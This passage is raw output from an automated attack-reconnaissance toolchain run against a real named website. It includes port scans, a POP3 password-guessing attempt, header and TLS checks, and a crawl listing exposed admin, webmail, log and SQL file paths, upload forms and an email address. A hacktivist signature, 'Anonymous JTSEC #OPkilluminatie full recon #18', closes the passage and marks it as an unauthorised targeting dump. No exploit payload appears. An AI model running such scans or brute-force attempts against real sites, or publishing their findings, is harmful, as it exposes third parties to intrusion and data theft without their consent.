  1368.  
  1369.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1370. |_[ + ] [ 11 / 13 ]-[22:42:26] [ - ]
  1371. |_[ + ] Target:: [ http://glmasonica.com/display/files/agm_en.pdf ]
  1372. |_[ + ] Exploit::
  1373. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1374. |_[ + ] More details::  / -  / , ISP:
  1375. |_[ + ] Found:: UNIDENTIFIED
  1376.  
  1377.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1378. |_[ + ] [ 12 / 13 ]-[22:42:29] [ - ]
  1379. |_[ + ] Target:: [ http://glmasonica.com/display/files/agminfo_en.pdf ]
  1380. |_[ + ] Exploit::
  1381. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1382. |_[ + ] More details::  / -  / , ISP:
  1383. |_[ + ] Found:: UNIDENTIFIED
  1384.  
  1385. [ INFO ] [ Shutting down ]
  1386. [ INFO ] [ End of process INURLBR at [15-04-2018 22:42:29]
  1387. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1388. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-glmasonica.com.txt  ]
  1389. |_________________________________________________________________________________________
  1390.  
  1391. \_________________________________________________________________________________________/
  1392.  
  1393.  + -- --=[Port 110 opened... running tests...
  1394. Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:42 EDT
  1395. Nmap scan report for glmasonica.com (192.252.149.45)
  1396. Host is up (0.45s latency).
  1397.  
  1398. PORT    STATE SERVICE VERSION
  1399. 110/tcp open  pop3    Dovecot pop3d
  1400. | pop3-brute:
  1401. |   Accounts: No valid accounts found
  1402. |   Statistics: Performed 55 guesses in 42 seconds, average tps: 1.5
  1403. |_  ERROR: Failed to connect.
  1404. |_pop3-capabilities: STLS RESP-CODES AUTH-RESP-CODE CAPA USER PIPELINING SASL(PLAIN) UIDL TOP
  1405. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1406. Device type: WAP|general purpose
  1407. Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 2.6.X (95%)
  1408. OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:2.6
  1409. Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 2.6.18 - 2.6.22 (95%), Linux 2.6.18 (88%)
  1410. No exact OS matches for host (test conditions non-ideal).
  1411. Network Distance: 1 hop
  1412.  
  1413. TRACEROUTE (using port 443/tcp)
  1414. HOP RTT       ADDRESS
  1415. 1   466.69 ms 192.252.149.45
  1416.  
  1417. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1418. Nmap done: 1 IP address (1 host up) scanned in 60.11 seconds
  1419.  + -- --=[Port 111 closed... skipping.
  1420.  + -- --=[Port 123 closed... skipping.
  1421.  + -- --=[Port 135 closed... skipping.
  1422.  + -- --=[Port 139 closed... skipping.
  1423.  + -- --=[Port 161 closed... skipping.
  1424.  + -- --=[Port 162 closed... skipping.
  1425.  + -- --=[Port 389 closed... skipping.
  1426.  + -- --=[Port 443 opened... running tests...
  1427. ====================================================================================
  1428.  CHECKING FOR WAF
  1429. ====================================================================================
  1430.  
  1431.                                  ^     ^
  1432.         _   __  _   ____ _   __  _    _   ____
  1433.        ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1434.       | V V // o // _/ | V V // 0 // 0 // _/
  1435.       |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
  1436.                                 <
  1437.                                  ...'
  1438.  
  1439.     WAFW00F - Web Application Firewall Detection Tool
  1440.  
  1441.     By Sandro Gauci && Wendel G. Henrique
  1442.  
  1443. Checking https://glmasonica.com
  1444. Generic Detection results:
  1445. No WAF detected by the generic detection
  1446. Number of requests: 13
  1447.  
  1448. ====================================================================================
  1449.  GATHERING HTTP INFO
  1450. ====================================================================================
  1451. ====================================================================================
  1452.  CHECKING HTTP HEADERS AND METHODS
  1453. ====================================================================================
  1454.  
  1455.     __  ______ _____
  1456.     \ \/ / ___|_   _|
  1457.      \  /\___ \ | |  
  1458.      /  \ ___) || |  
  1459.     /_/\_|____/ |_|  
  1460.  
  1461. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  1462. + -- --=[Target: glmasonica.com:443
  1463. + -- --=[Site not vulnerable to Cross-Site Tracing!
  1464. + -- --=[Site not vulnerable to Host Header Injection!
  1465. + -- --=[Site vulnerable to Cross-Frame Scripting!
  1466. + -- --=[Site vulnerable to Clickjacking!
  1467.  
  1468.  
  1469. HTTP/1.1 400 Bad Request
  1470. Date: Mon, 16 Apr 2018 02:44:07 GMT
  1471. Server: Apache
  1472. Content-Length: 362
  1473. Connection: close
  1474. Content-Type: text/html; charset=iso-8859-1
  1475.  
  1476. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1477. <html><head>
  1478. <title>400 Bad Request</title>
  1479. </head><body>
  1480. <h1>Bad Request</h1>
  1481. <p>Your browser sent a request that this server could not understand.<br />
  1482. Reason: You're speaking plain HTTP to an SSL-enabled server port.<br />
  1483.  Instead use the HTTPS scheme to access this URL, please.<br />
  1484. </p>
  1485. </body></html>
  1486.  
  1487.  
  1488.  
  1489. ====================================================================================
  1490.  CHECKING HTTP HEADERS
  1491. ====================================================================================
  1492. + -- --=[Checking if X-Content options are enabled on glmasonica.com...
  1493.  
  1494. + -- --=[Checking if X-Frame options are enabled on glmasonica.com...
  1495.  
  1496. + -- --=[Checking if X-XSS-Protection header is enabled on glmasonica.com...
  1497.  
  1498. + -- --=[Checking HTTP methods on glmasonica.com...
  1499.  
  1500. + -- --=[Checking if TRACE method is enabled on glmasonica.com...
  1501.  
  1502. + -- --=[Checking for META tags on glmasonica.com...
  1503. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  1504. <meta name="Keywords" content="" />
  1505. <meta name="Description" content="" />
  1506.  
  1507. + -- --=[Checking for open proxy on glmasonica.com...
  1508.  
  1509. + -- --=[Enumerating software on glmasonica.com...
  1510. Server: Apache
  1511.  
  1512. + -- --=[Checking if Strict-Transport-Security is enabled on glmasonica.com...
  1513.  
  1514. + -- --=[Checking for Flash cross-domain policy on glmasonica.com...
  1515. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1516. <html><head>
  1517. <title>404 Not Found</title>
  1518. </head><body>
  1519. <h1>Not Found</h1>
  1520. <p>The requested URL /crossdomain.xml was not found on this server.</p>
  1521. <p>Additionally, a 404 Not Found
  1522. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1523. </body></html>
  1524.  
  1525. + -- --=[Checking for Silverlight cross-domain policy on glmasonica.com...
  1526. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1527. <html><head>
  1528. <title>404 Not Found</title>
  1529. </head><body>
  1530. <h1>Not Found</h1>
  1531. <p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
  1532. <p>Additionally, a 404 Not Found
  1533. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1534. </body></html>
  1535.  
  1536. + -- --=[Checking for HTML5 cross-origin resource sharing on glmasonica.com...
  1537.  
  1538. + -- --=[Retrieving robots.txt on glmasonica.com...
  1539. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1540. <html><head>
  1541. <title>404 Not Found</title>
  1542. </head><body>
  1543. <h1>Not Found</h1>
  1544. <p>The requested URL /robots.txt was not found on this server.</p>
  1545. <p>Additionally, a 404 Not Found
  1546. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1547. </body></html>
  1548.  
  1549. + -- --=[Retrieving sitemap.xml on glmasonica.com...
  1550. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1551. <html><head>
  1552. <title>404 Not Found</title>
  1553. </head><body>
  1554. <h1>Not Found</h1>
  1555. <p>The requested URL /sitemap.xml was not found on this server.</p>
  1556. <p>Additionally, a 404 Not Found
  1557. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1558. </body></html>
  1559.  
  1560. + -- --=[Checking cookie attributes on glmasonica.com...
  1561. Set-Cookie: projector=0ea8bbc3426586fe0d4e2372714cf441; path=/
  1562.  
  1563. + -- --=[Checking for ASP.NET Detailed Errors on glmasonica.com...
  1564. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1565. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1566.  
  1567.  
  1568. #######################################################################################################################################
  1569.  
  1570.  
  1571.  
  1572.  AVAILABLE PLUGINS
  1573.  -----------------
  1574.  
  1575.   PluginCertInfo
  1576.   PluginCompression
  1577.   PluginChromeSha1Deprecation
  1578.   PluginSessionResumption
  1579.   PluginOpenSSLCipherSuites
  1580.   PluginSessionRenegotiation
  1581.   PluginHSTS
  1582.   PluginHeartbleed
  1583.  
  1584.  
  1585.  
  1586.  CHECKING HOST(S) AVAILABILITY
  1587.  -----------------------------
  1588.  
  1589.    glmasonica.com:443                  => 192.252.149.45:443
  1590.  
  1591.  
  1592.  
  1593.  SCAN RESULTS FOR GLMASONICA.COM:443 - 192.252.149.45:443
  1594.  --------------------------------------------------------
  1595.  
  1596.   * Deflate Compression:
  1597.       OK - Compression disabled          
  1598.  
  1599.   * Session Renegotiation:
  1600.       Client-initiated Renegotiations:   OK - Rejected
  1601.       Secure Renegotiation:              OK - Supported
  1602.  
  1603.   * Certificate - Content:
  1604.       SHA1 Fingerprint:                  a7aea2027082ba92402a9ea0fe1cb9cf36134a9f
  1605.       Common Name:                       server308.com
  1606.       Issuer:                            Let's Encrypt Authority X3
  1607.       Serial Number:                     036C4ABFF2559BE25A7E96F14E6764FEE474
  1608.       Not Before:                        Mar  4 07:30:28 2018 GMT
  1609.       Not After:                         Jun  2 07:30:28 2018 GMT
  1610.       Signature Algorithm:               sha256WithRSAEncryption
  1611.       Public Key Algorithm:              rsaEncryption
  1612.       Key Size:                          2048 bit
  1613.       Exponent:                          65537 (0x10001)
  1614.       X509v3 Subject Alternative Name:   {'DNS': ['server308.com', 'www.server308.com']}
  1615.  
  1616.   * Certificate - Trust:
  1617.       Hostname Validation:               FAILED - Certificate does NOT match glmasonica.com
  1618.       Google CA Store (09/2015):         FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
  1619.       Java 6 CA Store (Update 65):       OK - Certificate is trusted
  1620.       Microsoft CA Store (09/2015):      OK - Certificate is trusted
  1621.       Mozilla NSS CA Store (09/2015):    OK - Certificate is trusted
  1622.       Apple CA Store (OS X 10.10.5):     OK - Certificate is trusted
  1623.       Certificate Chain Received:        ['server308.com', "Let's Encrypt Authority X3"]
  1624.  
  1625.   * Certificate - OCSP Stapling:
  1626.       NOT SUPPORTED - Server did not send back an OCSP response.
  1627.  
  1628.   * SSLV2 Cipher Suites:
  1629.       Server rejected all cipher suites.
  1630.  
  1631.   * Session Resumption:
  1632.       With Session IDs:                  OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  1633.       With TLS Session Tickets:          OK - Supported
  1634.  
  1635.   * SSLV3 Cipher Suites:
  1636.       Server rejected all cipher suites.
  1637.  
  1638.  
  1639.  
  1640.  SCAN COMPLETED IN 9.64 S
  1641.  ------------------------
  1642. Version: 1.11.11-static
  1643. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1644.  
  1645. Connected to 192.252.149.45
  1646.  
  1647. Testing SSL server glmasonica.com on port 443 using SNI name glmasonica.com
  1648.  
  1649.   TLS Fallback SCSV:
  1650. Server supports TLS Fallback SCSV
  1651.  
  1652.   TLS renegotiation:
  1653. Secure session renegotiation supported
  1654.  
  1655.   TLS Compression:
  1656. Compression disabled
  1657.  
  1658.   Heartbleed:
  1659. TLS 1.2 not vulnerable to heartbleed
  1660. TLS 1.1 not vulnerable to heartbleed
  1661. TLS 1.0 not vulnerable to heartbleed
  1662.  
  1663.   Supported Server Cipher(s):
  1664. Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
  1665. Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
  1666. Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
  1667. Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve P-256 DHE 256
  1668. Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-GCM-SHA384     DHE 2048 bits
  1669. Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA256         DHE 2048 bits
  1670. Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384            
  1671. Accepted  TLSv1.2  256 bits  AES256-SHA256                
  1672. Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-GCM-SHA256     DHE 2048 bits
  1673. Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA256         DHE 2048 bits
  1674. Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256            
  1675. Accepted  TLSv1.2  128 bits  AES128-SHA256                
  1676. Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  1677. Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
  1678. Accepted  TLSv1.2  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
  1679. Accepted  TLSv1.2  256 bits  AES256-SHA                  
  1680. Accepted  TLSv1.2  256 bits  CAMELLIA256-SHA              
  1681. Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
  1682. Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
  1683. Accepted  TLSv1.2  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
  1684. Accepted  TLSv1.2  128 bits  AES128-SHA                  
  1685. Accepted  TLSv1.2  128 bits  CAMELLIA128-SHA              
  1686. Preferred TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  1687. Accepted  TLSv1.1  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
  1688. Accepted  TLSv1.1  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
  1689. Accepted  TLSv1.1  256 bits  AES256-SHA                  
  1690. Accepted  TLSv1.1  256 bits  CAMELLIA256-SHA              
  1691. Accepted  TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
  1692. Accepted  TLSv1.1  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
  1693. Accepted  TLSv1.1  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
  1694. Accepted  TLSv1.1  128 bits  AES128-SHA                  
  1695. Accepted  TLSv1.1  128 bits  CAMELLIA128-SHA              
  1696. Preferred TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  1697. Accepted  TLSv1.0  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
  1698. Accepted  TLSv1.0  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
  1699. Accepted  TLSv1.0  256 bits  AES256-SHA                  
  1700. Accepted  TLSv1.0  256 bits  CAMELLIA256-SHA              
  1701. Accepted  TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
  1702. Accepted  TLSv1.0  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
  1703. Accepted  TLSv1.0  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
  1704. Accepted  TLSv1.0  128 bits  AES128-SHA                  
  1705. Accepted  TLSv1.0  128 bits  CAMELLIA128-SHA              
  1706.  
  1707.   SSL Certificate:
  1708. Signature Algorithm: sha256WithRSAEncryption
  1709. RSA Key Strength:    2048
  1710.  
  1711. Subject:  server308.com
  1712. Altnames: DNS:server308.com, DNS:www.server308.com
  1713. Issuer:   Let's Encrypt Authority X3
  1714.  
  1715. Not valid before: Mar  4 07:30:28 2018 GMT
  1716. Not valid after:  Jun  2 07:30:28 2018 GMT
  1717.  
  1718. #######################################################################################################################################
  1719.   oooooo   oooo       .o.        .oooooo..o ooooo     ooo   .oooooo.
  1720.    `888.   .8'       .888.      d8P'    `Y8 `888'     `8'  d8P'  `Y8b
  1721.     `888. .8'       .88888.     Y88bo.       888       8  888      888
  1722.      `888.8'       .8' `888.     `ZY8888o.   888       8  888      888
  1723.       `888'       .88ooo8888.        `0Y88b  888       8  888      888
  1724.        888       .8'     `888.  oo     .d8P  `88.    .8'  `88b    d88'
  1725.       o888o     o88o     o8888o 88888888P'     `YbodP'     `Y8bood8P'
  1726. Welcome to Yasuo v2.3
  1727. Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
  1728. #######################################################################################################################################
  1729.  
  1730. I, [2018-04-15T22:48:14.755835 #20153]  INFO -- : Initiating port scan
  1731. I, [2018-04-15T22:55:51.933080 #20153]  INFO -- : Using nmap scan output file logs/nmap_output_2018-04-15_22-48-14.xml
  1732. I, [2018-04-15T22:55:51.972547 #20153]  INFO -- : Discovered open port: 192.252.149.45:80
  1733. I, [2018-04-15T22:55:53.785944 #20153]  INFO -- : Discovered open port: 192.252.149.45:443
  1734. I, [2018-04-15T22:55:57.648350 #20153]  INFO -- : Discovered open port: 192.252.149.45:993
  1735. I, [2018-04-15T22:56:01.484324 #20153]  INFO -- : Discovered open port: 192.252.149.45:995
  1736. I, [2018-04-15T22:56:05.310305 #20153]  INFO -- : <<<Enumerating vulnerable applications>>>
  1737. #######################################################################################################################################
  1738.  
  1739. Scan date: 15-4-2018 22:9:2
  1740. =======================================================================================================================================
  1741. | Domain: http://glmasonica.com/
  1742. | Server: Apache
  1743. | IP: 192.252.149.45
  1744. =======================================================================================================================================
  1745. |
  1746. | Directory check:
  1747. | [+] CODE: 200 URL: http://glmasonica.com/admin/
  1748. | [+] CODE: 302 URL: http://glmasonica.com/ajax/
  1749. | [+] CODE: 200 URL: http://glmasonica.com/contact/
  1750. | [+] CODE: 200 URL: http://glmasonica.com/data/
  1751. | [+] CODE: 200 URL: http://glmasonica.com/cp/
  1752. | [+] CODE: 200 URL: http://glmasonica.com/faq/
  1753. | [+] CODE: 200 URL: http://glmasonica.com/index/
  1754. | [+] CODE: 200 URL: http://glmasonica.com/logs/
  1755. | [+] CODE: 200 URL: http://glmasonica.com/modules/
  1756. | [+] CODE: 200 URL: http://glmasonica.com/temp/
  1757. =======================================================================================================================================
  1758. |                                                                                                  
  1759. | File check:
  1760. | [+] CODE: 200 URL: http://glmasonica.com/admin/index.php
  1761. | [+] CODE: 200 URL: http://glmasonica.com/cp/rac/nsManager.cgi
  1762. | [+] CODE: 200 URL: http://glmasonica.com/faq.php
  1763. | [+] CODE: 200 URL: http://glmasonica.com/index.php
  1764. | [+] CODE: 200 URL: http://glmasonica.com/webmail/lib/emailreader_execute_on_each_page.inc.php
  1765. | [+] CODE: 200 URL: http://glmasonica.com/webmail/blank.html
  1766. | [+] CODE: 200 URL: http://glmasonica.com/webmail/horde/test.php
  1767. | [+] CODE: 200 URL: http://glmasonica.com/webmail/src/read_body.php
  1768. | [+] CODE: 200 URL: http://glmasonica.com/webmail/src/configtest.php
  1769. =======================================================================================================================================
  1770. |
  1771. | Check robots.txt:
  1772. |
  1773. | Check sitemap.xml:
  1774. ======================================================================================================================================
  1775. |
  1776. | Crawler Started:
  1777. | Plugin name: E-mail Detection v.1.1 Loaded.
  1778. | Plugin name: phpinfo() Disclosure v.1 Loaded.
  1779. | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
  1780. | Plugin name: FCKeditor upload test v.1 Loaded.
  1781. | Plugin name: Upload Form Detect v.1.1 Loaded.
  1782. | Plugin name: External Host Detect v.1.2 Loaded.
  1783. | Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
  1784. | Plugin name: Code Disclosure v.1.1 Loaded.
  1785. | [+] Max Requests: 15000            
  1786. | [+] Crawling finished, 86011 URL's found!
  1787. |
  1788. | E-mails:
  1789. | [+] E-mail Found: glmasonica@intnet.mu
  1790. |
  1791. | PHPinfo() Disclosure:
  1792. |
  1793. | Timthumb:
  1794. |
  1795. | FCKeditor File Upload:
  1796. |
  1797. | File Upload Forms:
  1798. | [+] Upload Form Found: http://glmasonica.com/display/interfaces/forms.categories.add.tpl.html
  1799. | [+] Upload Form Found: http://glmasonica.com/display/interfaces/forms.membersimage.update.tpl.html
  1800. |
  1801. | External hosts:
  1802. | [+] External Host Found: https://cp.server308.com
  1803. |
  1804. | Web Backdoors:
  1805. |
  1806. | Source Code Disclosure:
  1807. |
  1808. | Ignored Files:
  1809. | http://glmasonica.com/data/sql/categories_add.sql
  1810. | http://glmasonica.com/data/sql/setup_maincategories.sql
  1811. | http://glmasonica.com/data/sql/z_cms_updateContentbyID.sql
  1812. | http://glmasonica.com/data/sql/cms_createContent.sql
  1813. | http://glmasonica.com/data/sql/cms_listPages.sql
  1814. | http://glmasonica.com/data/sql/cms_getPageData_all.sql
  1815. | http://glmasonica.com/data/sql/categories_list.sql
  1816. | http://glmasonica.com/data/sql/cms_getContent.sql
  1817. | http://glmasonica.com/data/sql/admin_login.sql
  1818. =======================================================================================================================================
  1819.  #####################################################################################################################################
  1820.                                             Anonymous JTSEC #OPkilluminatie full recon #18